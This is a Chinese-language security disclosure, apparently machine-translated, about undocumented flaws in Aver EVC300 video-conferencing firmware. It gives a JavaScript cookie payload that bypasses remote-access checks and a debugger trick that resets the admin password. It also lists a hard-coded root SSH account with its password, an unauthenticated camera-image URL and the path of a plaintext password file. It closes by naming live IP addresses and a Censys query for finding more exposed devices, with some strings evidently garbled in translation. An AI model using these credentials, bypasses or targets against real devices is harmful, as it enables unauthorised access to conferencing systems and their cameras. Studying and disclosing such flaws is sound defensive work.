Aver EVC300(多点视频会议系统)v00.10.16.36 硬编码

2021-12-22 14:47:48 浏览数 (1)

代码语言:javascript复制
Aver EVC300(多点视频会议系统)v00.10.16.36 和其他固件(以及 Aver 制造的其他几种设备的固件,可能都是多点视频会议系统)包含多项未详细记录的高级功能:

1. 即使 Web 管理被禁用,Web 管理服务器仍会继续运行。检查访问是设备本地访问还是远程访问是使用特定 cookie 在 Javascript 中完成的。
通过在页面加载期间按如下方式设置 cookie:

document.cookie="VnsSuperPassword=#qC9,kD:;CupSuperPassword=fu.1u3wk4;"
可以绕过远程访问限制,并使用“本地”用户界面。

2. 一旦绕过“访问限制”,就可以启用正常的远程访问。也可以通过设置重置管理员密码
使用 JS 调试将 adminPwd.js 中的 Javascript 变量(我们可用版本中的变量名称 j)设置为 1。这将禁用要求输入先前密码的安全检查。
这个功能显然是一个让孩子熟悉浏览器调试控制台的教育工具。

3. URL <EVC300 IP>/monitor/monitor.jpg 无论认证状态如何都可以访问,并根据设备状态显示设备所连接的监视器或相机的低分辨率图像。
旧版本的固件使用 URL "rimg/monitor.jpg"

4. 设备有 ssh 守护进程(dropbear,其他设备上的其他人)监听端口 1587、1588 和 1589。
它还有一个硬编码帐户 avermediainfo,密码为 avi2008,在设备上具有 root 权限。

1587/tcp 打开 ssh syn-ack ttl 63 Dropbear sshd 2013.60(协议 2.0)
1588/tcp 打开 ssh syn-ack ttl 62 Dropbear sshd 2013.60(协议 2.0)
1589/tcp 打开 ssh syn-ack ttl 62 Dropbear sshd 2013.60(协议 2.0)

5.通过ssh访问设备,可以读取文件/mnt/others/var/Olympus/Athena.ini,其中管理员密码以明文形式存储(“1234”为默认密码):
密码=“*****”
PPPoEPassword="平均"
SIPTerminalPassword=""
SIPServerPasswordOn=Y
SIPServerPassword="1234"
IwbPw="1234"
访问代码=“1234”
RegGatekeeperPwd=""
这对于忘记管理员密码并且不想打扰 JS 控制台的人来说非常方便。

6. 截至撰写本文时,上述功能可以在站点 vcdemo.aver.com (61.219.195.10) 以及同一范围内的其他几个 IP 地址(例如 61.219.195.23)上使用。
额外的寓教于乐端点可以通过使用 Nmap 找到,或者,例如,通过使用 censys.io 搜索 HTML 标题(services.http.response.html_title="Video Conference"),然后检查生成的 IP 地址。

0 人点赞